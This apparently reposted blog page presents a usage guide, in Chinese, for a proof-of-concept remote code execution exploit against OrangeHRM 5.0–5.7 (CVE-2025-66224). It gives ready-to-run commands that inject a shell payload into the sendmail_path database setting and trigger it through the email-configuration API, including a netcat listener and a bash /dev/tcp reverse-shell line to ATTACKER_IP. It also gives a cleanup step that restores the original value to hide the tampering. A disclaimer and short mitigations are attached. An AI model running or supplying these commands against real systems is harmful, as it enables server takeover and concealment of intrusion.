OrangeHRM RCE 最新漏洞利用 - CVE-2025-66224

zhengfei6112025-12-24 22:09

📋 描述

该概念验证(PoC)通过配置参数中的命令注入,展示了OrangeHRM中的远程代码执行(RCE)漏洞。sendmail_path

该漏洞的工作原理是:

  1. 向MySQL数据库(表)注入恶意负载hs_hr_config

  2. 通过电子邮件配置API端点触发负载执行

  3. 自动恢复原始值以清理走线

🎯 受影响版本

  • OrangeHRM 版本 5.0 至 5.7

⚠️免责声明

该工具仅供教育和授权安全测试目的。未经授权访问计算机系统是非法的。作者不对该工具造成的任何滥用或损害负责。

🔧 要求

复制代码
复制代码

pip install requests mysql-connector-python

📦 安装

复制代码
复制代码

git clone https://github.com/richard-natan/PoC-CVE-2025-66224 cd PoC-CVE-2025-66224 pip install -r requirements.txt

🚀 用途

步骤1:获取会话Cookie

  1. 通过网页界面登录OrangeHRM

  2. 打开浏览器开发者工具(F12)

  3. 访问存储>Cookies(Firefox)或应用>Cookies(Chrome)

  4. 复制cookie值_orangehrm

步骤2:运行漏洞

复制代码
复制代码

python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \ -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \ -cmd '<COMMAND_TO_EXECUTE>'

示例 - 简单命令

复制代码
复制代码

python3 exploit.py -t http://127.0.0.1:8080/ \ -c "g58tak8pbnheseatv6dggvi31i" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd "touch /tmp/pwned"

示例 - 反向壳

复制代码
复制代码

Start listener on attacker machine nc -lvnp 4444 # Execute exploit with reverse shell payload python3 exploit.py -t http://target.com/ \ -c "your_session_cookie" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 参数

参数 短篇 必填 描述
--target -t 目标URL(例如,http://target.com)
--cookie -c 会话 Cookie 值
--cookie_name -cn Cookie 名称(默认:_orangehrm)
--command -cmd 执行目标命令
--db_host -dh MySQL 主机地址
--db_user -du MySQL 用户名
--db_pass -dp MySQL 密码
--db_port -dport MySQL移植版(默认:3306)

🔍 工作原理

漏洞详情

漏洞存在于邮件配置功能中,参数存储在数据库中,之后在未经过适当净化的情况下执行。sendmail_path

开发流程:

复制代码
复制代码
  1. Authenticate to OrangeHRM (obtain valid session cookie) ↓ 2. Connect to MySQL database ↓ 3. Locate hs_hr_config table ↓ 4. Update email_config.sendmail_path value: FROM: /usr/sbin/sendmail -bs TO: /usr/sbin/sendmail -bs && <PAYLOAD> # ↓ 5. Trigger execution via API: PUT /web/index.php/api/v2/admin/email-configuration ↓ 6. Command executes on server ↓ 7. Restore original value (cleanup)

技术细节

脆弱参数: email_config.sendmail_path

数据库:

  • 表格:hs_hr_config

  • 列:= 'email_config.sendmail_path'name

  • 列:= sendmail 命令路径value

触发终点:

PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 缓解措施

  1. 输入验证:对参数实施严格验证sendmail_path

  2. 逃脱:执行前正确转义 shell 命令

  3. 最低特权:以最小权限运行网页服务器

  4. 更新:为 OrangeHRM 应用最新的安全补丁

🔗 参考文献

⚠️请负责任地使用。检测前务必获得适当授权。

相关推荐
Re.不晚12 分钟前
MySQL进阶之战——索引、事务与锁、高可用架构的三重奏
数据库·mysql·架构
老邓计算机毕设22 分钟前
SSM智慧社区信息化服务平台4v5hv(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
数据库·ssm 框架·智慧社区、·信息化平台
麦聪聊数据42 分钟前
为何通用堡垒机无法在数据库运维中实现精准风控?
数据库·sql·安全·低代码·架构
2301_790300961 小时前
Python数据库操作:SQLAlchemy ORM指南
jvm·数据库·python
m0_736919101 小时前
用Pandas处理时间序列数据(Time Series)
jvm·数据库·python
亓才孓1 小时前
[JDBC]PreparedStatement替代Statement
java·数据库
m0_466525292 小时前
绿盟科技风云卫AI安全能力平台成果重磅发布
大数据·数据库·人工智能·安全
爱学习的阿磊2 小时前
使用Fabric自动化你的部署流程
jvm·数据库·python
枷锁—sha2 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
惜分飞2 小时前
ORA-600 kcratr_nab_less_than_odr和ORA-600 4193故障处理--惜分飞
数据库·oracle
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04Linux下V2Ray安装配置指南05OpenClaw Chrome扩展使用教程 - 浏览器中继控制06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示